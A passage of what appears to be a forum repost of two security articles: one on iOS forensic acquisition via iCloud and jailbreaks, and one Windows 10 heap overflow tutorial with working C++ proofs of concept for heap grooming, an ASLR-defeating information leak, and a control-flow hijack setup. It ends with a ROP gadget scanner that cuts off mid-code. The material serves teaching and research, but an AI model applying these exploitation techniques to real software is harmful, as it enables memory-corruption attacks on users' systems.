may be possible if you know the user’s Apple ID and password and have access to their second authentication factor (if two-factor authentication is enabled on the user’s Apple account). Some bits and pieces may be accessed without the password by utilizing a binary authentication token. This, however, has very limited use today. Requirements: you must know the user’s Apple ID login and password and have access to the second authentication factor (if 2FA is enabled on the user account). If you require access to protected data categories (iCloud Keychain, iCloud Messages, Health etc.), you must know the passcode or system password to one of the already enrolled devices. 
To access synchronized data, you may use an existing authentication token instead of the login/password/2FA sequence. During the course of iCloud extraction, you'll have access to some or all of the following: iCloud backups, synchronized data and media files. If you know the passcode to the user's device, you may be able to access their iCloud Keychain, Health and Messages data.
Apple constantly improves iCloud protection, making it difficult or even impossible to access some types of data in a way other than restoring an actual iOS device. In a game of cat and mouse, manufacturers of forensic software try overcoming such protection measures, while Apple tries to stop third-party tools from accessing iCloud data. Note that some iCloud data (the backups, media files and synchronized data) can be obtained from Apple with a court order. However, even if you have the authority to file a request, Apple will not provide any encrypted data such as the user's passwords (iCloud Keychain), Health and Messages.
Physical acquisition
Physical is the most in-depth extraction method available. Today, physical acquisition of iOS devices is limited to file system extraction as opposed to imaging and decrypting the entire partition. With this method, experts can image the file system, access sandboxed app data, decrypt all the keychain records including those with the this_device_only attribute, extract system logs, and more. Compared to other acquisition methods, physical extraction additionally offers access to all of the following:
File system extraction:
- App databases with uncommitted transactions and WAL files
- Sandboxed app data for those apps that don't back up their contents
- Access to secure chats and protected messages (e.g. Signal, Telegram and many others)
- Downloaded email messages
- System logs
Keychain:
- Items protected with the this_device_only attribute
- This includes the password to iTunes backups
Physical is the riskiest and the most demanding method as well. The list of requirements includes the device itself in the unlocked state; the ability to pair the device with the computer; and a version of iOS that has known vulnerabilities so that a jailbreak can be installed.
The risks of jailbreaking
The risks of jailbreaking iOS devices largely depend on the jailbreak tool and installation procedure. However, the main risk of today's jailbreaks is not about bricking the device. A real risk of making the device unbootable existed in jailbreaks developed for early versions of iOS (up to and including iOS 9). These old jailbreaks were patching the kernel and attempted to bypass the system's Kernel Patch Protection (KPP) by patching other parts of the operating system. This was never completely reliable; in the worst-case scenario the device would not boot at all. Modern jailbreaks (targeting iOS 10 and newer) do not modify the kernel and do not need to deal with Kernel Patch Protection. As a result, the jailbroken device will always boot in a non-jailbroken state; you'll have to reapply the jailbreak on every boot.
The two risks of today's jailbreaks are:
Exposing the device to the Internet. By allowing the device to go online while installing a jailbreak, you're effectively allowing the device to sync data, downloading information that was not there at the time the device was seized.
Even worse, you’ll make the device susceptible to any remote block or remote erase commands that could be pending.The procedure of installing a jailbreak for the purpose of physical extraction is vastly different from jailbreaking for research or other purposes. In particular, forensic experts are struggling to keep devices offline in order to prevent data leaks, unwanted synchronization and issues with remote device management that may remotely block or erase the device. While there is no lack of jailbreaking guides and manuals for “general” jailbreaking, installing a jailbreak for the purpose of physical acquisition has multiple forensic implications and some important precautions.Mitigation: you can mitigate this risk by following the correct jailbreak installation procedure laid out in our guide on iOS jailbreaking. Jailbreak failing to install. Jailbreaks exploit chains of vulnerabilities in the operating system in order to obtain superuser privileges, escape the sandbox and allow the execution of unsigned applications. Since multiple vulnerabilities are consecutively exploited, the jailbreaking process may fail at any time. Mitigation: since different jailbreaks are using different code and may even target different exploits, the different jailbreak tools have different success rates. Do try another jailbreak tool if your original tool of choice had failed. Consequences of jailbreaking Different jailbreaks bear different consequences. A classic jailbreak such as Meridian, Pangu, TaiG, Chimera or Unc0ver needs to perform a long list of things in order to comply with what is expected of a jailbreak. Since the intended purpose of a jailbreak is allowing to install unsigned apps from third-party repositories, jailbreaks need to disable code signing checks and install a third-party package manager such as Cydia or Sileo. Such things require invasive modifications of the core of the operating system, inevitably remounting and modifying the system partition and writing files to the data partition. The new generation of jailbreaks has recently emerged. Rootless jailbreaks (e.g. RootlessJB) do not, by design, modify the system partition. A rootless jailbreak has a much smaller footprint compared to any classic jailbreak. On the flip side, rootless jailbreaks will not easily allow executing unsigned code or install a third-party package manager. However, they do include a working SSH daemon, making it possible to perform file system extraction. Since rootless jailbreaks do not alter the content of the system partition, one can easily remove such jailbreaks from the device, return the system to pre-jailbroken state and receive OTA updates afterwards. Generally speaking, this task would be very difficult (and sometimes impossible) to achieve when using classic jailbreaks. We have an article in our blog with more information about rootless jailbreaks and their differences from classic jailbreaks: iOS 12 Rootless Jailbreak. Companies such as Cellebrite and GrayShift do not rely on public jailbreaks to perform the extraction. Instead, they use a set of undisclosed exploits to access the file system of iOS devices directly. Using exploits directly has a number of benefits as the device’s file system is usually untouched during the extraction. The only traces left on the device after using an exploit for file system extraction would be entries in various system logs. So let us compare consequences of using a classic or rootless jailbreak to extract the file system. 
                                  Classic jailbreak    Rootless jailbreak   Direct exploit
File system remount               Yes                  No                   No
Modified system partition         Yes                  No                   No
Modified boot image (kernel)      No (since iOS 10)    No                   No
Entries in the system log         Yes                  Yes                  Yes
Device can install OTA updates    No                   Yes                  Yes
Access to "/"                     Yes                  w/ restrictions      Yes
Access to "/var"                  Yes                  Yes                  Yes
Keychain decryption               Yes                  Yes                  Yes
Repeatable results                No                   Yes                  Yes

File system remount
Generally speaking, we'd like to avoid the remount of the file system when jailbreaking the device. While remounting the file system opens read/write access to the root of the file system, it also introduces the potential of bricking the device due to incompatible modifications of the system partition that are made possible with r/w access. We can still extract user data and decrypt the keychain without remounting the file system.
Modified system partition
This, again, is something that we'd like to avoid when performing forensic extractions. Any modification made to the system partition can potentially brick the device or make it less stable. A modified system partition may break OTA updates (a full update or restore through iTunes is still possible). Classic jailbreaks write files to the system partition to ensure that unsigned apps can be installed and launched. We can still access the full content of the data partition and decrypt the keychain without modifying the system partition.
Modified boot image
Early jailbreaks (up to and including jailbreaks targeting all versions of iOS 9) used to patch the kernel in order to achieve an untethered jailbreak. While being "untethered" means the device remains jailbroken indefinitely between reboots, modifying the kernel has some severe disadvantages, including compromised stability and general unreliability of jailbroken devices. Since Apple introduced advanced Kernel Patch Protection (KPP) mechanisms, patching the kernel became less attractive. Public jailbreaks targeting iOS 10 and all newer versions of iOS moved away from patching the kernel.
System log entries
The installation and operation of a jailbreak leaves multiple traces in the form of entries in various log files throughout the system. This is pretty much unavoidable and should be taken into consideration.
OTA compatibility
Depending on the type of a jailbreak, a jailbroken device may or may not be able to accept over-the-air (OTA) updates after you're done with extraction. Some classic jailbreaks make modifications to the device that make it impossible to install OTA updates even after the jailbreak is removed. Some jailbreaks make it possible to create a system restore point (using APFS mechanisms), so at least in theory rolling back the device to a pre-jailbroken state should be possible. In our experience, this is not reliable enough. On the other hand, rootless jailbreaks do not alter the system partition at all, making OTA updates easily possible.
Access to the root of the file system "/"
Classic jailbreaks provide read/write access to the root of the file system, making it possible to dump the content of the system partition as well as the data partition. Rootless jailbreaks only offer access to the content of the data partition ("/var"), which is sufficient for the purpose of forensic extraction.
Access to the data partition "/var"
All types of jailbreaks offer access to user data stored in the data partition. The complete file system is available, including installed applications and their sandboxed data, databases, system log files and much more.
Access to keychain One can decrypt the keychain (passwords and autofill entries in Safari and installed apps) using either type of jailbreak. All keychain entries can be decrypted including those protected with the highest protection class and flagged this_device_only. Repeatable results Jailbreaks are unreliable in their nature. They are using undocumented exploits to obtain superuser privileges and secure access to the file system. A jailbreak may fail to install and require multiple attempts. Since jailbreaks modify the content of the device, we may not consider the results to be fully repeatable. However, rootless jailbreaks feature significantly cleaner footprint compared to classic ones. Conclusion Without a doubt, jailbreaks do have a fair share of forensic implications. One can significantly reduce the number and severity of negative consequences by selecting and using the jailbreak with care. However, even in worst-case scenarios, the benefits of physical extraction may far outweigh the drawbacks of jailbreaking. Sursa: https://blog.elcomsoft.com/2019/06/forensic-implications-of-ios-jailbreaking/
  23. Heap Overflow Exploitation on Windows 10 Explained Wei Chen Jun 12, 2019 14 min read POST STATS: 0 SHARE Introduction I remember the first time I attempted to exploit a memory corruption vulnerability. It was a stack buffer overflow example I tried to follow in this book called “Hacking: The Art of Exploitation.” I fought for weeks, and I failed. It wasn't until months later that I tried a different example on the internet and finally popped a shell. I was so thrilled I got it to work. More than 10 years later, I have some memory corruption exploits under my belt, from small-third-party applications to high-profile products such as Microsoft, Adobe, Oracle, Mozilla, and IBM. However, memory corruption for me is still quite a challenge, despite having a soft spot for it. And I don't think I'm the only person to feel this way. LiveOverflow, who is most well known for his hacking videos on YouTube, shares the same feeling about approaching browser exploitation in the early stage, saying: I know the theory. It's just a scary topic, and I don't even know where to start. My impression is that many people certainly feel this way about heap corruptions, which are indeed difficult because they are unpredictable in nature, and the mitigations are always evolving. About every couple of years, some major security improvement would be introduced, likely terminating a vulnerability class or an exploitation technique. Although a Black Hat talk may follow explaining that, those talks are probably overwhelming for the most part. People may get a grasp of the theory, it still remains a scary topic, and they still don't even know where to start. As LiveOverflow points out, there is a lot of value in explaining how you mastered something, more than just publishing an exploit. Being a former Corelan member, I know that some of the best exploit tutorials from Corelan started off this way, with Peter Van Eeckhoutte and his team researching the topic, documenting the process, and in the end, sharing that with the public. By doing so, you encourage the community to engage on the topic, and one day, someone is going to advance and share something new in return. Learning by creating Learning a vulnerability from a real application can be difficult because the codebase may be complex. Often, you may get away with examining a good crash, get EIP, add some shellcode, and get a working exploit, but you may not fully understand the actual problem as quickly. If the developers didn't spend just a few days building the codebase, there certainly isn't any magic to absorb so much internal knowledge about it in such a short amount of time. One way that guarantees I will learn about a vulnerability is by figuring out how to create it and mess with it. That's what we'll do today. Since heap corruption is such a scary topic, let's start with a heap overflow on Windows 10. Heap overflow example This is a basic example of a heap overflow. Clearly, it is trying to pass a size of 64 bytes to a smaller heap buffer that is only 32 bytes. #include <stdio.h> int main(int args, char** argv) { void* heap = (void*) malloc(32); memset(heap, 'A', 64); printf("%s\n", heap); free(heap); heap = NULL; return 0; } In a debugger, you will be presented with an error of 0xc0000374, indicating a heap corruption exception that is due to a failed inspection on the heap, resulting in a call to RtlpLogHeapFailure. 
A modern system is really good at protecting its heaps nowadays, and every time you see this function call is pretty much a sign that you have been defeated. Exploitability depends more on how much control you have on the application, and there is no silver bullet on the OS level like in previous years. Client-side applications (such as a browser, PDF, Flash, etc.) tend to be excellent targets due to the support of scripting languages. It’s very likely you have indirect control of an array, a HeapAlloc, a HeapFree, a vector, strings, etc., which are all good tools you need to instrument a heap corruption—except you have to find them. A difficult first step to success In C/C++ applications, a programming error may create opportunities like allowing the program to read the wrong memory, writing to the wrong place, or even executing the wrong code. Normally, we just call these conditions crashes, and there is actually an industry out there of people totally obsessed with finding and controlling them. By taking over the "bad" memory the program isn't supposed to read, we have witnessed Heartbleed. If the program writes to it, you have a buffer overflow. If you can combine all of them on a remote Windows machine, that's just as bad as EternalBlue. Whatever your exploit is, an important first step usually involves setting up the right environment in memory to land that attack. Kind of like in social engineering, you have this thing called pretexting. Well, in exploit writing, we have various names: Feng shui, massaging, grooming, etc. Every program loves a good massage, right? Windows 7 vs. Windows 10 The Windows 10 internals seem significantly different from their predecessors. You might have noticed some recent high-profile exploits that were all done against older systems. For example, Google Chrome's FileReader Use After Free was documented to work best on Windows 7, the BlueKeep RDP flaw was mostly proven in public to work on Windows XP, and Zerodium confirmed RCE on Windows 7. Predicable heap allocations is an important trait for heap grooming, so I wrote a test below for both systems. Basically, it creates multiple objects and tracks where they are. There is also a Summerize() method that tells me all the offsets found between two objects and the most common offset. void SprayTest() { OffsetTracker offsetTracker; LPVOID* objects = new LPVOID[OBJECT_COUNT]; for (int i = 0; i < OBJECT_COUNT; i++) { SomeObject* obj = new SomeObject(); objects[i] = obj; if (i > 0) { int offset = (int) objects[i] - (int) objects[i-1]; offsetTracker.Register(offset); printf("Object at 0x%08x. Offset to previous = 0x%08x\n", (int) obj, offset); } else { printf("Object at 0x%08x\n", (int) obj); } } printf("\n"); offsetTracker.Summerize(); The results for Windows 7: Basically, my test tool is suggesting that 97.8% of the time, my heap allocations look like this consecutively: [ Object ][ 0x30 of Bytes ][ Object ] For the exact same code, Windows 10 behaves very differently: Wow, only 6%. That means if I had an exploit, I wouldn't have any reliable layout to work with, and my best choice would make me fail 94% of the time. I might as well not write an exploit for it. The right way to groom As it turns out, Windows 10 requires a different way to groom, and it is slightly more complicated than before. After having multiple discussions with Peter from Corelan, the conclusion is that we shouldn’t bother using low-fragmentation heap, because that is what messing with our results. Front- vs. 
back-end allocator Low fragmentation heap is a way to allow the system to allocate memory in certain predetermined sizes. It means when the application asks for an allocation, the system returns the minimum available chunk that fits. This sounds really nice, except on Windows 10, it also tends to avoid giving you a chunk that has the same size as its neighbor. You can check whether a heap is being handled by LFH using the following in WinDBG: dt _HEAP [Heap Address] There is a field named FrontEndHeapType at offset 0x0d6. If the value is 0, it means the heap is handled by the backend allocator. 1 means LOOKASIDE. And 2 means LFH. Another way to check if a chunk belongs to LFH is: !heap -x [Chunk Address] The backend allocator is actually the default choice, and it takes at least 18 allocations to enable LFH. Also, those allocations don't have to be consecutive—they just need to be the same size. For example: #include <Windows.h> #include <stdio.h> #define CHUNK_SIZE 0x300 int main(int args, char** argv) { int i; LPVOID chunk; HANDLE defaultHeap = GetProcessHeap(); for (i = 0; i < 18; i++) { chunk = HeapAlloc(defaultHeap, 0, CHUNK_SIZE); printf("[%d] Chunk is at 0x%08x\n", i, chunk); } for (i = 0; i < 5; i++) { chunk = HeapAlloc(defaultHeap, 0, CHUNK_SIZE); printf("[%d] New chunk in LFH : 0x%08x\n", i ,chunk); } system("PAUSE"); return 0; } The code above produced the following results: The two loops do the same thing in code. The first iterates 18 times, and the second is five times. By observing those addresses, there are some interesting facts: In the first loop: Index 0 and index 1 have a huge gap of 0x1310 bytes. Starting index 2 to index 16, that gap is consistently 0x308 bytes. Index 16 and index 17 get a huge gap again with 0x3238 bytes. In the second loop: Index 0 is where LFH kicks in. Each gap is random, usually far away from each other. It appears the sweet spot where we have most control is between index 2 to 16 in the first loop, before LFH is triggered. The beauty of overtaking A feature of the Windows heap manager is that it knows how to reuse a freed chunk. In theory, if you free a chunk and allocate another for the exact same size, there is a good chance it will take over the freed space. Taking advantage of this, you could write an exploit without heap spraying. I can't say exactly who was the first person to apply this technique, but Peter Vreugdenhil from Exodus was certainly one of the first to talk about it publicly. See: HAPPY NEW YEAR ANALYSIS OF CVE-2012-4792. To verify this, let's write another C code: #include <Windows.h> #include <stdio.h> #define CHUNK_SIZE 0x300 int main(int args, char** argv) { int i; LPVOID chunk; HANDLE defaultHeap = GetProcessHeap(); // Trigger LFH for (i = 0; i < 18; i++) { HeapAlloc(defaultHeap, 0, CHUNK_SIZE); } chunk = HeapAlloc(defaultHeap, 0, CHUNK_SIZE); printf("New chunk in LFH : 0x%08x\n", chunk); BOOL result = HeapFree(defaultHeap, HEAP_NO_SERIALIZE, chunk); printf("HeapFree returns %d\n", result); chunk = HeapAlloc(defaultHeap, 0, CHUNK_SIZE); printf("Another new chunk : 0x%08x\n", chunk); system("PAUSE"); return 0; } On Windows 7, it seems this technique is legit (both addresses are the same): For the exact same code, the outcome is quite different on Windows 10: However, our hope is not lost. An interesting behavior by the Windows heap manager is that apparently for efficiency purposes, it can split a large free chunk in order to service smaller chunks the application requests. 
That means the smaller chunks may coalesce (merge), making them adjacent from each other. To achieve that, the overall steps kind of play out like the following. 1. Allocate chunks not handled by LFH Try to pick a size that is not used by the application, which tends to be a larger size. In our example, let's say our size choice is 0x300. Allocate no more than 18 chunks, probably a minimum of five. 2. Pick a chunk that you want to free The ideal candidate is obviously not the first chunk or the 18th chunk. The chunk you choose should have the same offset between its previous one and also the next one. So, that means you want to make sure you have this layout before you free the middle one: [ Chunk 1 ][ Chunk 2 ][ Chunk 3 ] 3. Make a hole By freeing the middle chunk, you technically create a hole that looks like this: [ Chunk 1 ][ Free chunk ][ Chunk 3 ] 4. Create smaller allocations for a coalescing miracle Usually, the ideal chunks are actually objects from the application. An ideal one, for example, is some kind of object with a size header you could modify. The structure of a BSTR fits perfectly for this scenario: [ 4 bytes (length prefix) ][ WCHAR* + \0 ] It may take some trials and errors to craft the right object size, and make them fall into the hole you created. If done right, within 10 allocations, at least one will fall into the hole, which creates this: [ Chunk 1 ][ BSTR ][ Chunk 3 ] 5. Repeat step 3 (another hole) Another hole will be used to place objects we want to leak. Your new layout might look like this: [ Chunk 1 ][ BSTR ][ Free Chunk ] 6. Repeat step 4 (creates objects to leak) In the last free chunk, we want to fill that with objects we wish to leak. To create these, you want to pick something that allows you control a heap allocation, where you can save pointers for the same object (which can be anything). A vector or something array-like would do great for this kind of job. Once again, you may need to experiment with different sizes to find the one that wants to be in the hole. 
The new allocation should take over the last chunk like so: [ Chunk 1 ][ BSTR ][ Array of pointers ] The implementation This proof-of-concept demonstrates how the above procedure may be implemented in C++: #include <Windows.h> #include <comdef.h> #include <stdio.h> #include <vector> using namespace std; #define CHUNK_SIZE 0x190 #define ALLOC_COUNT 10 class SomeObject { public: void function1() {}; virtual void virtual_function1() {}; }; int main(int args, char** argv) { int i; BSTR bstr; HANDLE hChunk; void* allocations[ALLOC_COUNT]; BSTR bStrings[5]; SomeObject* object = new SomeObject(); HANDLE defaultHeap = GetProcessHeap(); for (i = 0; i < ALLOC_COUNT; i++) { hChunk = HeapAlloc(defaultHeap, 0, CHUNK_SIZE); memset(hChunk, 'A', CHUNK_SIZE); allocations[i] = hChunk; printf("[%d] Heap chunk in backend : 0x%08x\n", i, hChunk); } HeapFree(defaultHeap, HEAP_NO_SERIALIZE, allocations[3]); for (i = 0; i < 5; i++) { bstr = SysAllocString(L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"); bStrings[i] = bstr; printf("[%d] BSTR string : 0x%08x\n", i, bstr); } HeapFree(defaultHeap, HEAP_NO_SERIALIZE, allocations[4]); int objRef = (int) object; printf("SomeObject address for Chunk 3 : 0x%08x\n", objRef); vector<int> array1(40, objRef); vector<int> array2(40, objRef); vector<int> array3(40, objRef); vector<int> array4(40, objRef); vector<int> array5(40, objRef); vector<int> array6(40, objRef); vector<int> array7(40, objRef); vector<int> array8(40, objRef); vector<int> array9(40, objRef); vector<int> array10(40, objRef); system("PAUSE"); return 0; } For debugging reasons, the program logs where the allocations are when you run it: To verify things are in the right place, we can look at it with WinDBG. Our proof-of-concept actually aims index 2 as the BSTR chunk, so we can check the memory dump for that: It looks like we have executed that well—all three chunks are arranged correctly. If you have read this far without falling asleep, congratulations! We are finally ready to move on and talk about everyone's favorite part of exploitation, which is overflowing the heap (on Windows 10). Exploiting heap overflow I think at this point, you might have guessed that the most painful part about overflowing the heap isn't actually overflowing the heap. It is the time and effort it takes to set up the desired memory layout. By the time you are ready to exploit the bug, you are already mostly done with it. It would be fair to say that the more preparation you do on grooming, the more reliable it is. To recap, before you are ready to exploit a heap overflow to cause an information leak, you want to make sure you have control of a layout that should be similar to this for an information leak: [ Chunk 1 ][ BSTR ][ Array of pointers ] A precise overwrite For this exploitation scenario, the most important objective for our heap overflow is actually this: Precisely overwrite the BSTR length. The length field is a four-byte value found before the BSTR string: In this example, you want to change the hex value 0xF8 to something bigger like 0xFF, which allows the BSTR to read 255 bytes. It is more than enough to read past the BSTR and collect data in the next chunk. Your code may look like this: As far as the application is concerned, the BSTR now contains some pointers we want. We are finally ready to claim our reward. 
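As a side note before reading the leaked data: the reason the BSTR length prefix is such a convenient target can be shown with a small standalone sketch (my own illustration, not the article's code). The four bytes immediately before the BSTR pointer hold its length in bytes, and SysStringByteLen simply trusts that value, which is exactly what an adjacent overflow abuses.

#include <Windows.h>
#include <oleauto.h>
#include <stdio.h>
#pragma comment(lib, "OleAut32.lib")

int main()
{
    BSTR s = SysAllocString(L"AAAAAAAA");

    // The 4 bytes right before the BSTR pointer store the string length in
    // bytes; SysStringByteLen() just reads this prefix back.
    DWORD prefix = ((DWORD*)s)[-1];
    printf("length prefix = %lu, SysStringByteLen = %u\n", prefix, SysStringByteLen(s));

    // Simulate what the adjacent heap overflow does: enlarge the prefix so
    // that the string APIs are willing to read far past the real data.
    ((DWORD*)s)[-1] = 0xFF;
    printf("after overwrite, SysStringByteLen = %u\n", SysStringByteLen(s));

    ((DWORD*)s)[-1] = prefix;  // restore the original prefix before freeing
    SysFreeString(s);
    return 0;
}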
Reading the leaked data When you are reading the BSTR with vftable pointers in it, you want to figure out exactly where those four bytes are, then substring it. With these four raw bytes you have leaked, you want to convert them into an integer value. The following example demonstrates how to do that: std::wstring ws(bStrings[0], strSize); std::wstring ref = ws.substr(120+16, 4); char buf[4]; memcpy(buf, ref.data(), 4); int refAddr = int((unsigned char)(buf[3]) << 24 | (unsigned char)(buf[2]) << 16 | (unsigned char)(buf[1]) << 8 | (unsigned char)(buf[0])); Other languages would really approach conversion in a similar way. Since JavaScript is quite a popular tool for heap exploitation, here's another example to demonstrate: var bytes = "AAAA"; var intVal = bytes.charCodeAt(0) | bytes.charCodeAt(1) << 8 | bytes.charCodeAt(2) << 16 | bytes.charCodeAt(3) << 24; // This gives you 1094795585 console.log(intVal); Once you have the vftable address, you can use that to calculate the image's base address. An interesting piece of information you want to know is that the location of vftables are predetermined in the .rdata section, which means as long as you don't recompile, your vftable should stay there: This makes calculating the image base address a lot easier: Offset to Image Base = VFTable - Image Base Address For the final product for our information leak, here's the source code: #include <Windows.h> #include <comdef.h> #include <stdio.h> #include <vector> #include <string> #include <iostream> using namespace std; #define CHUNK_SIZE 0x190 #define ALLOC_COUNT 10 class SomeObject { public: void function1() {}; virtual void virtual_function1() {}; }; int main(int args, char** argv) { int i; BSTR bstr; BOOL result; HANDLE hChunk; void* allocations[ALLOC_COUNT]; BSTR bStrings[5]; SomeObject* object = new SomeObject(); HANDLE defaultHeap = GetProcessHeap(); if (defaultHeap == NULL) { printf("No process heap. 
Are you having a bad day?\n"); return -1; } printf("Default heap = 0x%08x\n", defaultHeap); printf("The following should be all in the backend allocator\n"); for (i = 0; i < ALLOC_COUNT; i++) { hChunk = HeapAlloc(defaultHeap, 0, CHUNK_SIZE); memset(hChunk, 'A', CHUNK_SIZE); allocations[i] = hChunk; printf("[%d] Heap chunk in backend : 0x%08x\n", i, hChunk); } printf("Freeing allocation at index 3: 0x%08x\n", allocations[3]); result = HeapFree(defaultHeap, HEAP_NO_SERIALIZE, allocations[3]); if (result == 0) { printf("Failed to free\n"); return -1; } for (i = 0; i < 5; i++) { bstr = SysAllocString(L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"); bStrings[i] = bstr; printf("[%d] BSTR string : 0x%08x\n", i, bstr); } printf("Freeing allocation at index 4 : 0x%08x\n", allocations[4]); result = HeapFree(defaultHeap, HEAP_NO_SERIALIZE, allocations[4]); if (result == 0) { printf("Failed to free\n"); return -1; } int objRef = (int) object; printf("SomeObject address : 0x%08x\n", objRef); printf("Allocating SomeObject to vectors\n"); vector<int> array1(40, objRef); vector<int> array2(40, objRef); vector<int> array3(40, objRef); vector<int> array4(40, objRef); vector<int> array5(40, objRef); vector<int> array6(40, objRef); vector<int> array7(40, objRef); vector<int> array8(40, objRef); vector<int> array9(40, objRef); vector<int> array10(40, objRef); UINT strSize = SysStringByteLen(bStrings[0]); printf("Original String size: %d\n", (int) strSize); printf("Overflowing allocation 2\n"); char evilString[] = "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "BBBBBBBBBBBBBBBB" "CCCCDDDD" "\xff\x00\x00\x00"; memcpy(allocations[2], evilString, sizeof(evilString)); strSize = SysStringByteLen(bStrings[0]); printf("Modified String size: %d\n", (int) strSize); std::wstring ws(bStrings[0], strSize); std::wstring ref = ws.substr(120+16, 4); char buf[4]; memcpy(buf, ref.data(), 4); int refAddr = int((unsigned char)(buf[3]) << 24 | (unsigned char)(buf[2]) << 16 | (unsigned char)(buf[1]) << 8 | (unsigned char)(buf[0])); memcpy(buf, (void*) refAddr, 4); int vftable = int((unsigned char)(buf[3]) << 24 | (unsigned char)(buf[2]) << 16 | (unsigned char)(buf[1]) << 8 | (unsigned char)(buf[0])); printf("Found vftable address : 0x%08x\n", vftable); int baseAddr = vftable - 0x0003a490; printf("====================================\n"); printf("Image base address is : 0x%08x\n", baseAddr); printf("====================================\n"); system("PAUSE"); return 0; } And FINALLY, let's witness the sweet victory: After the leak By leaking the vftable and image address, exploiting the application at this point would be a lot like the pre-ASLR era, with the only thing left that stands between you and a shell is DEP. You can easily collect some ROP gadgets utilizing the leak, defeat DEP, and get the exploit to work. One thing to keep in mind is that no matter what DLL (image) you choose to collect the ROP gadgets, there may be multiple versions of that DLL that are used by end users around the world. There are ways to overcome this. 
For example, you could write something that scans the image for the ROP gadgets you need. Or, you could collect all the versions you can find for that DLL, create ROPs for them, and then use the leak to check which version of DLL your exploit is using, and then return the ROP chain accordingly. Other methods are also possible. Arbitrary code execution Now that we are done with the leak, we are one big step closer to get arbitrary code execution. If you managed to read through the process on how to use a heap overflow to leak data, this part isn't such a stranger to you after all. Although there are multiple ways to approach this problem, we can actually borrow the same idea from the leak technique and get an exploitable crash. One of the magic tricks lies within the behavior of a vector. In C++, a vector is a dynamic array that grows or shrinks automatically. A basic example looks like this: #include <vector> #include <string> #include <iostream> using namespace std; int main(int args, char** argv) { vector<string> v; v.push_back("Hello World!"); cout << v.at(0) << endl; return 0; } It is a wonderful tool for exploits because of the way it allows us to create an arbitrary sized array that contains pointers we control. It also saves the content on the heap, so that means you can use this to make heap allocations, something you already have seen in the information leak examples. Borrowing this idea, we could come up with a strategy like this: Create an object. Similar to the leak setup, allocate some chunks no more than 18 (to avoid LFH). Free one of the chunks (somewhere between the 2nd or the 16th) Create 10 vectors. Each is filled with pointers to the same object. You may need to play with the size to figure out exactly how big the vectors should be. Hopefully, the content from one of the vectors will take over the freed chunk. Overflow the chunk that's found before the freed one. Use the object that the vector holds. 
The implementation of the above strategy looks something like this: #include <Windows.h> #include <stdio.h> #include <vector> using namespace std; #define CHUNK_SIZE 0x190 #define ALLOC_COUNT 10 class SomeObject { public: void function1() { }; virtual void virtualFunction() { printf("test\n"); }; }; int main(int args, char** argv) { int i; HANDLE hChunk; void* allocations[ALLOC_COUNT]; SomeObject* objects[5]; SomeObject* obj = new SomeObject(); printf("SomeObject address : 0x%08x\n", obj); int vectorSize = 40; HANDLE defaultHeap = GetProcessHeap(); for (i = 0; i < ALLOC_COUNT; i++) { hChunk = HeapAlloc(defaultHeap, 0, CHUNK_SIZE); memset(hChunk, 'A', CHUNK_SIZE); allocations[i] = hChunk; printf("[%d] Heap chunk in backend : 0x%08x\n", i, hChunk); } HeapFree(defaultHeap, HEAP_NO_SERIALIZE, allocations[3]); vector<SomeObject*> v1(vectorSize, obj); vector<SomeObject*> v2(vectorSize, obj); vector<SomeObject*> v3(vectorSize, obj); vector<SomeObject*> v4(vectorSize, obj); vector<SomeObject*> v5(vectorSize, obj); vector<SomeObject*> v6(vectorSize, obj); vector<SomeObject*> v7(vectorSize, obj); vector<SomeObject*> v8(vectorSize, obj); vector<SomeObject*> v9(vectorSize, obj); vector<SomeObject*> v10(vectorSize, obj); printf("vector : 0x%08x\n", v1); printf("vector : 0x%08x\n", v2); printf("vector : 0x%08x\n", v3); printf("vector : 0x%08x\n", v4); printf("vector : 0x%08x\n", v5); printf("vector : 0x%08x\n", v6); printf("vector : 0x%08x\n", v7); printf("vector : 0x%08x\n", v8); printf("vector : 0x%08x\n", v9); printf("vector : 0x%08x\n", v10); memset(allocations[2], 'B', CHUNK_SIZE + 8 + 32); v1.at(0)->virtualFunction(); system("PAUSE"); return 0; } Since the content of the vector (that fell into the hole) is overwritten with data we control, if there is some function that wants to use it (which expects to print "test"), we end up getting a good crash that is exploitable, which can be chained with the information leak to build a full-blown exploit. Summary Modern heap exploitation is a fascinating and difficult subject to master. It takes a lot of time and effort to reverse engineer the internals of the application before you know what you can leverage to instrument the corruption. Most of us can be easily overwhelmed by this, and sometimes we end up feeling like we know almost nothing about the subject. However, since most memory corruption problems are based on C/C++, you can build your own vulnerable cases to experience them. That way, when you face a real CVE, it is no longer a scary topic: You know how to identify the primitives, and you have given yourself a shot at exploiting the CVE. And maybe, one day when you discover something cool, give back to the community that taught you how to be where you are today. Special thanks to Steven Seeley (mr_me) and Peter Van Eeckhoutte (Corelanc0d3r). Sursa: https://blog.rapid7.com/2019/06/12/heap-overflow-exploitation-on-windows-10-explained/
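Picking up on the article's suggestion of scanning the leaked image for ROP gadgets at runtime: a rough, hypothetical sketch is shown below (32-bit mindset matching the article, scanning the whole mapped image instead of only executable sections, error handling omitted). In a real exploit the base address would come from the info leak rather than GetModuleHandle.

#include <Windows.h>
#include <stdio.h>
#include <string.h>

// Scan a mapped image for a gadget byte pattern; returns NULL if not found.
static const BYTE* FindGadget(const BYTE* base, SIZE_T size,
                              const BYTE* pattern, SIZE_T patLen)
{
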